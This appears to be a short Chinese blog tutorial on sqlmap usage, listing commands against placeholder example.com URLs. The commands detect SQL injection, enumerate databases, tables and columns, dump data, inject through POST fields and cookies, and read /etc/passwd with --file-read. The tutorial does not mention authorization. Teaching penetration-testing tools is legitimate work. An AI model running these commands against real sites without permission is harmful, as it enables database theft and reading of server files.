kali sqlmap使用方法

基本使用方法

1.测试目标网站是否存在SQL注入漏洞bash复制sqlmap -u "http://www.example.com/index.php?id=1" --batch

其中,“http://www.example.com/index.php?id=1”是目标URL,“--batch”表示以批处理模式运行SQLMap,不询问用户输入。

2.确认注入点sqlmap -u "http://www.example.com/index.php?id=1" --batch --dbs

这个命令将输出目标网站上所有可用的数据库名称。

3.获取数据库信息sqlmap -u "http://www.example.com/index.php?id=1" --batch -D dbname --tables

其中,“-D dbname”表示指定数据库名称,“--tables”表示列出所有可用的表名。

4.获取表信息sqlmap -u "http://www.example.com/index.php?id=1" --batch -D dbname -T tablename --columns

其中,“-T tablename”表示指定表名,“--columns”表示列出所有可用的列名。

5.获取列信息sqlmap -u "http://www.example.com/index.php?id=1" --batch -D dbname -T tablename -C columnname --dump

其中,“-C columnname”表示指定列名,“--dump”表示将结果输出到文件中。

高级使用方法

除了基本的SQL注入攻击,SQLMap还提供了许多高级功能,如POST请求注入、Cookie注入、文件读取等。

1.POST请求注入sqlmap -u "http://www.example.com/login.php" --data="username=admin&password=123456" --batch

其中,“--data”表示要发送的POST数据。2.Cookie注入sqlmap -u "http://www.example.com/index.php" --cookie="PHPSESSID=123456" --batch

其中,“--cookie”表示要使用的Cookie。

3.文件读取sqlmap -u "http://www.example.com/index.php?id=1" --file-read="/etc/passwd" --batch

其中,“--file-read”表示要读取的文件名。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值